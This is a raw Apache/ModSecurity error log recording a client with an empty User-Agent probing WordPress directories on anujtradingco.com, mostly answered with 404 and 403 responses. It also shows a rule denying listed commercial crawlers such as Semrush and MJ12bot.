[Tue May 26 17:06:14.646195 2026] [security2:error] [pid 851641:tid 851849] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrhp8QSN2510avp45bQAAAE4"]
[Tue May 26 17:06:14.678065 2026] [security2:error] [pid 851641:tid 851848] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/include/"] [unique_id "ahWFrhp8QSN2510avp45awAAAE0"]
[Tue May 26 17:06:15.022231 2026] [security2:error] [pid 851641:tid 851841] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrhp8QSN2510avp45dwAAAEY"]
[Tue May 26 17:06:15.022254 2026] [security2:error] [pid 851641:tid 851841] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrhp8QSN2510avp45dwAAAEY"]
[Tue May 26 17:06:15.022829 2026] [security2:error] [pid 851641:tid 851774] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/Assets/"] [unique_id "ahWFrhp8QSN2510avp45dQAAAAM"]
[Tue May 26 17:06:15.537962 2026] [security2:error] [pid 851641:tid 851847] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrxp8QSN2510avp45hgAAAEw"]
[Tue May 26 17:06:15.537993 2026] [security2:error] [pid 851641:tid 851847] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrxp8QSN2510avp45hgAAAEw"]
[Tue May 26 17:06:15.538598 2026] [security2:error] [pid 851641:tid 851822] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/images/stories/"] [unique_id "ahWFrxp8QSN2510avp45hAAAADM"]
[Tue May 26 17:06:15.830774 2026] [security2:error] [pid 851641:tid 851791] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrxp8QSN2510avp45kgAAABQ"]
[Tue May 26 17:06:15.830797 2026] [security2:error] [pid 851641:tid 851791] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFrxp8QSN2510avp45kgAAABQ"]
[Tue May 26 17:06:15.831423 2026] [security2:error] [pid 851641:tid 851876] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/plugins/"] [unique_id "ahWFrxp8QSN2510avp45kAAAAGk"]
[Tue May 26 17:06:15.892886 2026] [security2:error] [pid 851641:tid 851784] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFrxp8QSN2510avp45hwAAAA0"]
[Tue May 26 17:06:16.399029 2026] [security2:error] [pid 851641:tid 851806] [client 45.151.139.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsBp8QSN2510avp45ogAAACM"], referer: https://anujtradingco.com
[Tue May 26 17:06:16.532481 2026] [security2:error] [pid 851641:tid 851800] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsBp8QSN2510avp45pwAAAB0"]
[Tue May 26 17:06:16.532503 2026] [security2:error] [pid 851641:tid 851800] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsBp8QSN2510avp45pwAAAB0"]
[Tue May 26 17:06:16.533005 2026] [security2:error] [pid 851641:tid 851798] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/php/"] [unique_id "ahWFsBp8QSN2510avp45pAAAABs"]
[Tue May 26 17:06:16.928881 2026] [autoindex:error] [pid 851641:tid 851833] [client 89.117.104.11:48000] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:16.929635 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFsBp8QSN2510avp45rQAAAD4"]
[Tue May 26 17:06:17.236515 2026] [security2:error] [pid 851641:tid 851861] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsRp8QSN2510avp45uAAAAFo"]
[Tue May 26 17:06:17.236555 2026] [security2:error] [pid 851641:tid 851861] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsRp8QSN2510avp45uAAAAFo"]
[Tue May 26 17:06:17.236717 2026] [security2:error] [pid 851641:tid 851792] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/twentytwenty/"] [unique_id "ahWFsRp8QSN2510avp45tgAAABU"]
[Tue May 26 17:06:17.626975 2026] [security2:error] [pid 851641:tid 851811] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsRp8QSN2510avp45zQAAACg"]
[Tue May 26 17:06:17.627012 2026] [security2:error] [pid 851641:tid 851811] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFsRp8QSN2510avp45zQAAACg"]
[Tue May 26 17:06:17.627745 2026] [security2:error] [pid 851641:tid 851808] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/cache/"] [unique_id "ahWFsRp8QSN2510avp45ywAAACU"]
[Tue May 26 17:06:18.053820 2026] [autoindex:error] [pid 851641:tid 851843] [client 89.117.104.11:48000] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/maint/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:18.054539 2026] [security2:error] [pid 851641:tid 851843] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFsRp8QSN2510avp451AAAAEg"]
[Tue May 26 17:06:18.335474 2026] [security2:error] [pid 851641:tid 851854] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFshp8QSN2510avp452gAAAFM"]
[Tue May 26 17:06:18.335503 2026] [security2:error] [pid 851641:tid 851854] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFshp8QSN2510avp452gAAAFM"]
[Tue May 26 17:06:18.340636 2026] [security2:error] [pid 851641:tid 851874] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/akismet/"] [unique_id "ahWFshp8QSN2510avp452AAAAGc"]
[Tue May 26 17:06:18.540544 2026] [security2:error] [pid 851641:tid 851876] [client 85.208.96.208:26266] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWFshp8QSN2510avp454gAAAGk"]
[Tue May 26 17:06:18.540686 2026] [security2:error] [pid 851641:tid 851876] [client 85.208.96.208:26266] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWFshp8QSN2510avp454gAAAGk"]
[Tue May 26 17:06:18.710363 2026] [autoindex:error] [pid 851641:tid 851803] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:18.711037 2026] [security2:error] [pid 851641:tid 851803] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFshp8QSN2510avp457QAAACA"]
[Tue May 26 17:06:18.711428 2026] [security2:error] [pid 851641:tid 851829] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/assets/"] [unique_id "ahWFshp8QSN2510avp456wAAADo"]
[Tue May 26 17:06:18.916404 2026] [autoindex:error] [pid 851641:tid 851851] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:18.917110 2026] [security2:error] [pid 851641:tid 851851] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFshp8QSN2510avp458wAAAFA"]
[Tue May 26 17:06:18.917585 2026] [security2:error] [pid 851641:tid 851771] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/block-patterns/"] [unique_id "ahWFshp8QSN2510avp458QAAAAA"]
[Tue May 26 17:06:18.984743 2026] [security2:error] [pid 851641:tid 851877] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFshp8QSN2510avp456QAAAGo"]
[Tue May 26 17:06:19.132471 2026] [autoindex:error] [pid 851641:tid 851833] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:19.133138 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFsxp8QSN2510avp45-QAAAD4"]
[Tue May 26 17:06:19.133544 2026] [security2:error] [pid 851641:tid 851857] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/block-supports/"] [unique_id "ahWFsxp8QSN2510avp459wAAAFY"]
[Tue May 26 17:06:19.378704 2026] [autoindex:error] [pid 851641:tid 851821] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/html-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:19.379374 2026] [security2:error] [pid 851641:tid 851821] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFsxp8QSN2510avp46CAAAADI"]
[Tue May 26 17:06:19.379768 2026] [security2:error] [pid 851641:tid 851779] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/html-api/"] [unique_id "ahWFsxp8QSN2510avp46BgAAAAg"]
[Tue May 26 17:06:19.629375 2026] [autoindex:error] [pid 851641:tid 851841] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:19.630037 2026] [security2:error] [pid 851641:tid 851841] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFsxp8QSN2510avp46CwAAAEY"]
[Tue May 26 17:06:19.652121 2026] [security2:error] [pid 851641:tid 851855] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/js/"] [unique_id "ahWFsxp8QSN2510avp46CQAAAFQ"]
[Tue May 26 17:06:19.874728 2026] [autoindex:error] [pid 851641:tid 851891] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:19.875387 2026] [security2:error] [pid 851641:tid 851891] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFsxp8QSN2510avp46FAAAAHg"]
[Tue May 26 17:06:19.875733 2026] [security2:error] [pid 851641:tid 851870] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/php-compat/"] [unique_id "ahWFsxp8QSN2510avp46EgAAAGM"]
[Tue May 26 17:06:20.372365 2026] [autoindex:error] [pid 851641:tid 851778] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:20.373145 2026] [security2:error] [pid 851641:tid 851778] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtBp8QSN2510avp46HQAAAAc"]
[Tue May 26 17:06:20.382405 2026] [security2:error] [pid 851641:tid 851867] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/PHPMailer/"] [unique_id "ahWFtBp8QSN2510avp46GwAAAGA"]
[Tue May 26 17:06:20.392299 2026] [security2:error] [pid 851641:tid 851822] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFtBp8QSN2510avp46GgAAADM"]
[Tue May 26 17:06:20.602262 2026] [autoindex:error] [pid 851641:tid 851880] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:20.602973 2026] [security2:error] [pid 851641:tid 851880] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtBp8QSN2510avp46JQAAAG0"]
[Tue May 26 17:06:20.603620 2026] [security2:error] [pid 851641:tid 851823] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/pomo/"] [unique_id "ahWFtBp8QSN2510avp46IwAAADQ"]
[Tue May 26 17:06:20.725542 2026] [security2:error] [pid 851641:tid 851824] [client 149.20.243.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFtBp8QSN2510avp46LQAAADU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:06:20.863363 2026] [security2:error] [pid 851641:tid 851780] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFtBp8QSN2510avp46MwAAAAk"]
[Tue May 26 17:06:20.863397 2026] [security2:error] [pid 851641:tid 851780] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFtBp8QSN2510avp46MwAAAAk"]
[Tue May 26 17:06:20.864019 2026] [security2:error] [pid 851641:tid 851868] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-includes/random_compat/"] [unique_id "ahWFtBp8QSN2510avp46MQAAAGE"]
[Tue May 26 17:06:20.899052 2026] [security2:error] [pid 851641:tid 851847] [client 114.119.136.12:37547] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jobs.ucdc.co.in"] [uri "/jobdetail.php"] [unique_id "ahWFtBp8QSN2510avp46NAAAAEw"], referer: https://www.jobs.ucdc.co.in/jobsearch.php?role=QXJjaGl0ZWN0dXJlICYgRW5naW5lZXJpbmc%3D&page=1
[Tue May 26 17:06:21.206268 2026] [autoindex:error] [pid 851641:tid 851801] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:21.206968 2026] [security2:error] [pid 851641:tid 851801] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtRp8QSN2510avp46PAAAAB4"]
[Tue May 26 17:06:21.207401 2026] [security2:error] [pid 851641:tid 851839] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/rest-api/"] [unique_id "ahWFtRp8QSN2510avp46OgAAAEQ"]
[Tue May 26 17:06:21.673470 2026] [autoindex:error] [pid 851641:tid 851853] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:21.674237 2026] [security2:error] [pid 851641:tid 851853] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFtRp8QSN2510avp46SwAAAFI"]
